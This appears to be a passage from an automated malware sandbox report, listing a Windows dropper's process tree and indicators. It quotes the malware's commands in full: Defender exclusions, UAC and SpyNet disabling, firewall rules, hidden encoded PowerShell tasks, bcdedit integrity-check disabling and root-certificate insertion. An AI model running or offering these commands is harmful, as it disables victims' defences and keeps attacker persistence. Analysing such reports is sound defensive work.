a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 file.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 file.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2760 file.exe 2760 file.exe 312 powershell.exe 1536 uxf8mXBfEKTRBQXR1KuWCnLl.exe 1920 xO4GOimcBGQkXzhbomVS7wqE.exe 2136 nso8C0C.tmp 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 1736 powershell.EXE 2944 injector.exe 2944 injector.exe 1736 powershell.EXE 1736 powershell.EXE 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe 2944 injector.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 468 Process not Found -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2760 file.exe Token: SeDebugPrivilege 752 AddInProcess32.exe Token: SeDebugPrivilege 312 powershell.exe Token: SeDebugPrivilege 1536 uxf8mXBfEKTRBQXR1KuWCnLl.exe Token: SeImpersonatePrivilege 1536 uxf8mXBfEKTRBQXR1KuWCnLl.exe Token: SeDebugPrivilege 1920 xO4GOimcBGQkXzhbomVS7wqE.exe Token: SeImpersonatePrivilege 1920 xO4GOimcBGQkXzhbomVS7wqE.exe Token: SeSystemEnvironmentPrivilege 2052 csrss.exe Token: SeDebugPrivilege 1736 powershell.EXE Token: SeSecurityPrivilege 1556 sc.exe Token: SeSecurityPrivilege 1556 sc.exe Token: SeDebugPrivilege 1696 powershell.EXE Token: SeDebugPrivilege 2100 powershell.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2476 BroomSetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2760 wrote to memory of 312 2760 file.exe 28 PID 2760 wrote to memory of 312 2760 file.exe 28 PID 2760 wrote to memory of 312 2760 file.exe 28 PID 2760 wrote to memory of 312 2760 file.exe 28 PID 2760 wrote to memory of 656 2760 file.exe 30 PID 2760 wrote to memory of 656 2760 file.exe 30 PID 2760 wrote to memory of 656 2760 file.exe 30 PID 2760 wrote to memory of 656 2760 file.exe 30 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 2760 wrote to memory of 752 2760 file.exe 31 PID 752 wrote to memory of 2044 752 AddInProcess32.exe 32 PID 752 wrote to memory of 2044 752 AddInProcess32.exe 32 PID 752 wrote to memory of 2044 752 AddInProcess32.exe 32 PID 752 wrote to memory of 2044 752 AddInProcess32.exe 32 PID 752 wrote to memory of 1536 752 AddInProcess32.exe 33 PID 752 wrote to memory of 1536 752 AddInProcess32.exe 33 PID 752 wrote to memory of 1536 752 AddInProcess32.exe 33 PID 752 wrote to memory of 1536 752 AddInProcess32.exe 33 PID 752 wrote to memory of 1920 752 AddInProcess32.exe 34 PID 752 wrote to memory of 1920 752 AddInProcess32.exe 34 PID 752 wrote to memory of 1920 752 AddInProcess32.exe 34 PID 752 wrote to memory of 1920 752 AddInProcess32.exe 34 PID 2044 wrote to memory of 2476 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 35 PID 2044 wrote to memory of 2476 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 35 PID 2044 wrote to memory of 2476 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 35 PID 2044 wrote to memory of 2476 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 35 PID 2044 wrote to memory of 2476 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 35 PID 2044 wrote to memory of 2476 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 35 PID 2044 wrote to memory of 2476 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 35 PID 752 wrote to memory of 2512 752 AddInProcess32.exe 37 PID 752 wrote to memory of 2512 752 AddInProcess32.exe 37 PID 752 wrote to memory of 2512 752 AddInProcess32.exe 37 PID 752 wrote to memory of 2512 752 AddInProcess32.exe 37 PID 2044 wrote to memory of 2136 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 43 PID 2044 wrote to memory of 2136 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 43 PID 2044 wrote to memory of 2136 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 43 PID 2044 wrote to memory of 2136 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 43 PID 752 wrote to memory of 1752 752 AddInProcess32.exe 46 PID 752 wrote to memory of 1752 752 AddInProcess32.exe 46 PID 752 wrote to memory of 1752 752 AddInProcess32.exe 46 PID 752 wrote to memory of 1752 752 AddInProcess32.exe 46 PID 1156 wrote to memory of 1760 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 47 PID 1156 wrote to memory of 1760 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 47 PID 1156 wrote to memory of 1760 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 47 PID 1156 wrote to memory of 1760 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 47 PID 2848 wrote to memory of 2356 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 52 PID 2848 wrote to memory of 2356 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 52 PID 2848 wrote to memory of 2356 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 52 PID 2848 wrote to memory of 2356 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 52 PID 1760 wrote to memory of 2768 1760 cmd.exe 49 PID 1760 wrote to memory of 2768 1760 cmd.exe 49 PID 1760 wrote to memory of 2768 1760 cmd.exe 49 PID 2356 wrote to memory of 3024 2356 cmd.exe 51 PID 2356 wrote to memory of 3024 2356 cmd.exe 51 PID 2356 wrote to memory of 3024 2356 cmd.exe 51 PID 2476 wrote to memory of 512 2476 BroomSetup.exe 54 PID 2476 wrote to memory of 512 2476 BroomSetup.exe 54 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2760 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:312
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵PID:656
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Users\Admin\Pictures\qf2qmDJ9ve1MH2AQC1wZpqmY.exe"C:\Users\Admin\Pictures\qf2qmDJ9ve1MH2AQC1wZpqmY.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵PID:512
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:1208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:1192
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nso8C0C.tmpC:\Users\Admin\AppData\Local\Temp\nso8C0C.tmp4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2136 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nso8C0C.tmp" & del "C:\ProgramData\*.dll"" & exit5⤵PID:3040
-
C:\Windows\SysWOW64\timeout.exetimeout /t 56⤵
- Delays execution with timeout.exe
PID:2024
-
-
-
-
-
C:\Users\Admin\Pictures\uxf8mXBfEKTRBQXR1KuWCnLl.exe"C:\Users\Admin\Pictures\uxf8mXBfEKTRBQXR1KuWCnLl.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536 -
C:\Users\Admin\Pictures\uxf8mXBfEKTRBQXR1KuWCnLl.exe"C:\Users\Admin\Pictures\uxf8mXBfEKTRBQXR1KuWCnLl.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:2356
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2052 -
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:2908
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:2756 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}7⤵
- Modifies boot configuration data using bcdedit
PID:1980
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 07⤵
- Modifies boot configuration data using bcdedit
PID:868
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast7⤵
- Modifies boot configuration data using bcdedit
PID:2900
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}7⤵
- Modifies boot configuration data using bcdedit
PID:656
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 17⤵
- Modifies boot configuration data using bcdedit
PID:1916
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn7⤵
- Modifies boot configuration data using bcdedit
PID:2108
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 07⤵
- Modifies boot configuration data using bcdedit
PID:2980
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe7⤵
- Modifies boot configuration data using bcdedit
PID:2072
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe7⤵
- Modifies boot configuration data using bcdedit
PID:1480
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows7⤵
- Modifies boot configuration data using bcdedit
PID:2620
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:7⤵
- Modifies boot configuration data using bcdedit
PID:1952
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:7⤵
- Modifies boot configuration data using bcdedit
PID:1960
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER7⤵
- Modifies boot configuration data using bcdedit
PID:2516
-
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:1368
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe6⤵
- Executes dropped EXE
PID:2856
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v6⤵
- Modifies boot configuration data using bcdedit
PID:1236
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:3020
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:2308 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:2056
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\xO4GOimcBGQkXzhbomVS7wqE.exe"C:\Users\Admin\Pictures\xO4GOimcBGQkXzhbomVS7wqE.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1920 -
C:\Users\Admin\Pictures\xO4GOimcBGQkXzhbomVS7wqE.exe"C:\Users\Admin\Pictures\xO4GOimcBGQkXzhbomVS7wqE.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:2768
-
-
-
-
-
C:\Users\Admin\Pictures\uSAXN67jO1NV6A1Dms0TQwUe.exe"C:\Users\Admin\Pictures\uSAXN67jO1NV6A1Dms0TQwUe.exe"3⤵
- Executes dropped EXE
PID:2512
-
-
C:\Users\Admin\Pictures\4Obr3e4WwXT6zfKFALzQ6SNr.exe"C:\Users\Admin\Pictures\4Obr3e4WwXT6zfKFALzQ6SNr.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==3⤵
- Executes dropped EXE
PID:1752
-
-
C:\Users\Admin\Pictures\HWoskNzoWXP58nKa90DwL1zh.exe"C:\Users\Admin\Pictures\HWoskNzoWXP58nKa90DwL1zh.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2088
-
-
C:\Users\Admin\Pictures\zP1vBkts9eMW4Mc2oRVOrTfC.exe"C:\Users\Admin\Pictures\zP1vBkts9eMW4Mc2oRVOrTfC.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\7zSE531.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2372 -
C:\Users\Admin\AppData\Local\Temp\7zSEA6E.tmp\Install.exe.\Install.exe /LzfYdidLoSR "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
PID:1884 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:1520
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:1668
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:1320
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:2816
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gtzrKiwwP" /SC once /ST 05:01:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:1748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gtzrKiwwP"6⤵PID:560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gtzrKiwwP"6⤵PID:268
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bmfUAJAHieefCXsdaD" /SC once /ST 19:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\vPxFIBw.exe\" hp /oIsite_idbJe 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2104
-
-
-
-
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240126190528.log C:\Windows\Logs\CBS\CbsPersist_20240126190528.cab1⤵PID:2620
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:3024
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:1208
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:321⤵PID:1432
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:641⤵PID:2200
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&1⤵PID:2300
-
C:\Windows\system32\taskeng.exetaskeng.exe {D424D445-8F23-4681-A850-FC3D99EF06D0} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:Interactive:[1]1⤵PID:2748
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2068
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1696 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1708
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2100 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:868
-
-
-
